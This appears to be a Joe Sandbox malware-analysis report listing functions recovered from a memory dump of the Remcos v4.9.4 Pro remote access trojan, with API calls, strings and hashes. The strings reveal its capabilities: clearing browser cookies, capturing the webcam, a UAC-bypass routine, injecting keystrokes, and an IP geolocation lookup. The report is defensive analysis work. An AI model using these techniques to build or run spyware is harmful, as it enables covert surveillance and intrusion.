                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                        • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                        Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                        Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16_free
                                        • String ID: a/p$am/pm$zD
                                        • API String ID: 2936374016-2723203690
                                        • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                        • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                        Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Enum$InfoQueryValue
                                        • String ID: [regsplt]$xUG$TG
                                        • API String ID: 3554306468-1165877943
                                        • Opcode ID: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
                                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                        • Opcode Fuzzy Hash: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
                                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                        Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                        • __fassign.LIBCMT ref: 0044B479
                                        • __fassign.LIBCMT ref: 0044B494
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                        Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: D[E$D[E
                                        • API String ID: 269201875-3695742444
                                        • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                        • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                        Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumInfoOpenQuerysend
                                        • String ID: xUG$NG$NG$TG
                                        • API String ID: 3114080316-2811732169
                                        • Opcode ID: 78b4761bafa789b7ec0324fc523b2a0aab5d4531e2e1c5ea0475fcb8cdd1609c
                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                        • Opcode Fuzzy Hash: 78b4761bafa789b7ec0324fc523b2a0aab5d4531e2e1c5ea0475fcb8cdd1609c
                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                        Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                        • _wcslen.LIBCMT ref: 0041B763
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                        • API String ID: 37874593-122982132
                                        • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                        • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                        Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                        • API String ID: 1133728706-4073444585
                                        • Opcode ID: 59f5114bd6e2efbc69d05e513e653785be42e7b7fbf21b675d61eac15074141f
                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                        • Opcode Fuzzy Hash: 59f5114bd6e2efbc69d05e513e653785be42e7b7fbf21b675d61eac15074141f
                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                        Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                        • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                        Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                        Strings
                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpen$FileRead
                                        • String ID: http://geoplugin.net/json.gp
                                        • API String ID: 3121278467-91888290
                                        • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                        • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                        Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                        • _free.LIBCMT ref: 00450F48
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00450F53
                                        • _free.LIBCMT ref: 00450F5E
                                        • _free.LIBCMT ref: 00450FB2
                                        • _free.LIBCMT ref: 00450FBD
                                        • _free.LIBCMT ref: 00450FC8
                                        • _free.LIBCMT ref: 00450FD3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                        Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                        • int.LIBCPMT ref: 00411183
                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID: (mG
                                        • API String ID: 2536120697-4059303827
                                        • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                        • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                        Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                        • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                        Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004075D0
                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                        • CoUninitialize.OLE32 ref: 00407629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InitializeObjectUninitialize_wcslen
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                        • API String ID: 3851391207-3324213274
                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                        Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                        Strings
                                        • UserProfile, xrefs: 0040BAAD
                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 2018770650-304995407
                                        • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                        • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                        Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Console$AllocOutputShowWindow
                                        • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                        • API String ID: 2425139147-3065609815
                                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                        Function 0041ADC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                        • String ID: Alarm triggered$`#v
                                        • API String ID: 614609389-3049340936
                                        • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                        • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                        Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 0043AC69
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                        • __allrem.LIBCMT ref: 0043AC9C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                        • __allrem.LIBCMT ref: 0043ACD1
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                        Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: H_prologSleep
                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                        • API String ID: 3469354165-3054508432
                                        • Opcode ID: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                        • Opcode Fuzzy Hash: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                        Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                        • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
